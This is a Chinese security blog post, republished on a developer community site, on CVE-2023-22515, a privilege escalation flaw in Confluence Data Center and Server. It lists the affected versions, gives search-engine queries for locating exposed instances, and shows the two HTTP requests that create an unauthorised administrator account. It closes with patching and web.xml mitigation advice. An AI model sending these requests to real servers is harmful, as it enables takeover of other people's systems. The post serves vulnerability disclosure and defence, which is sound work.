前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2023-22515:Confluence权限提升漏洞

CVE-2023-22515:Confluence权限提升漏洞

作者头像
Timeline Sec
发布2023-11-01 19:39:23
8090
发布2023-11-01 19:39:23
举报
文章被收录于专栏:Timeline SecTimeline Sec

关注我们❤️,添加星标🌟,一起学安全! 作者:Locks_@Timeline Sec

0x01 简介

Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。

0x02 漏洞概述

漏洞编号:CVE-2023-22515

攻击者可以利用有访问权限的Confluence Data Center and Server实例漏洞在未授权的情况下创建Confluence管理员用户并以管理员权限进入Confluence后台。

0x03 影响版本

8.0.0 <= Confluence Data Center and Confluence Server <= 8.0.4

8.1.0 <= Confluence Data Center and Confluence Server <= 8.1.4

8.2.0 <= Confluence Data Center and Confluence Server <= 8.2.3

8.3.0 <= Confluence Data Center and Confluence Server <= 8.3.2

8.4.0 <= Confluence Data Center and Confluence Server <= 8.4.2

8.5.0 <= Confluence Data Center and Confluence Server <= 8.5.1

0x04 环境搭建

fofa:app="Atlassian-Confluence"

hunter:app.name="Confluence"

0x05 漏洞复现

漏洞URL:

代码语言:javascript
复制
http://localhost/login.action?logout=true

第一次发包:发送首次请求包为:

代码语言:javascript
复制
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1

第二次发包:添加管理员账号

代码语言:javascript
复制
POST /setup/setupadministrator.action HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Atlassian-Token: no-check
Content-Length: 122
Content-Type: application/x-www-form-urlencoded

username=newadmin1&fullName=newadmin1&email=1234567123@qq.com&password=newPassword1&confirm=newPassword1&setup-next-button=Next

凭借新添加的账号进行登录

利用思路:

1、利用 ParametersInterceptor 的属性覆盖绕过 /setup/* 路由的限制,访问 /setup/setupadministrator.action 添加管理员

2、找到能触发 ParametersInterceptor 的 action,然后覆盖 setupComplete 绕过 SetupCheckInterceptor 对 /setup/* 路由的限制,然后访问 /setup/setupadministrator.action 添加管理员。

0x06 修复方式

官方修复方案:

建议您更新当前系统或软件至最新版,完成漏洞的修复。

临时缓解方案:

1、修改 //confluence/WEB-INF/web.xml 文件,并添加以下内容(就在文件末尾的 标签之前):

代码语言:javascript
复制
<security-constraint>
      <web-resource-collection>
        <url-pattern>/setup/*</url-pattern>
      <http-method-omission>*</http-method-omission>
    </web-resource-collection>
      <auth-constraint />
  </security-constraint>

2、重新启动 Confluence

参考链接

https://mp.weixin.qq.com/s/99quAfbrwkXS40MqMUBY2w

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2023-10-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Timeline Sec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x01 简介
  • 0x02 漏洞概述
  • 0x03 影响版本
  • 0x04 环境搭建
  • 0x05 漏洞复现
  • 0x06 修复方式
  • 参考链接
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档